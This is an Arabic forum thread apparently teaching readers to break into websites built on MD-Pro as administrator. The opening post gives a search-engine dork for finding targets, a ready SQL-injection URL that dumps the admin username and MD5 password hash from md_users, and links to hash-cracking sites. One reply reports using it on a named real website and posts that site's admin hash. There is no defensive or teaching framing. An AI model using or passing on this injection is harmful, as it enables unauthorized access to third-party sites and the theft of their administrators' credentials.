السلام عليكم هناك طريقه سهله جدا للدخول كأدمن في المواقع... 1-الخطوة الأولى : نذهب إلى google,yahoo و نضع كود PHP: "powered by md-pro" ثم بحث...

الان أدخل كأدمن على مواقع "powered by MD-pro "
السلام عليكم

هناك طريقه سهله جدا للدخول
كأدمن في المواقع...



1-الخطوة الأولى : نذهب إلى google,yahoo و نضع
كود PHP:
"powered by md-pro"
ثم بحث.

1206890743.jpg



2-الخطوة الثانية : إختر موقعا "يجب البحث على الموقع المناسب و هناك العديد"
كيف نعرف أن هذا الموقع مناسب?
نفتح أي موقع و نضيف هذه العبارة :


كود PHP:
/index.php?module=Topics&func=view&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null, null,null from md_users where pn_uid=2/*


و يجب الحصول على مثل هذه النتيجة
1206889131.jpg



.و كما ترون
.admin=stefan
7aa9f13ab4cb39975b22d7d9cbe456fa=password
هناك العديد من الطرق لفك مثل هذه الرموز md5

1206890610.jpg



إضغط هنا


http://gdataonline.com/seekhash.php

او
http://www.milw0rm.com/



الأن لديك كل ما يلزمك لدخول كأدمن!!!


كود:

www.[sitename].com/index.php?module=Topics&func=view&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null, null,null from md_users where pn_uid=2/*

والثغرة sql injection



بالموفقيه اخواااني ..
 

MATRIX ALGERIA

New Member
الان أدخل كأدمن على مواقع "powered by MD-pro "
مشكور اخي وهاذا تطبيق على الثغرة
الموقع http://www.enerb.it/
الاسم admin
الباس 3dc0b0262e0c955c4e1782b6a74fa16c
لم اقم بفك الهاش خخخخ
 

p4w

New Member
الان أدخل كأدمن على مواقع "powered by MD-pro "
[gdwl][align=center]مشكور يا اخي شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية . [/align][/gdwl]
 

hank00sh

New Member
الان أدخل كأدمن على مواقع "powered by MD-pro "
رد: الان أدخل كأدمن على مواقع "powered by MD-pro "

مشكور اخي

تقبل مروري
 
أعلى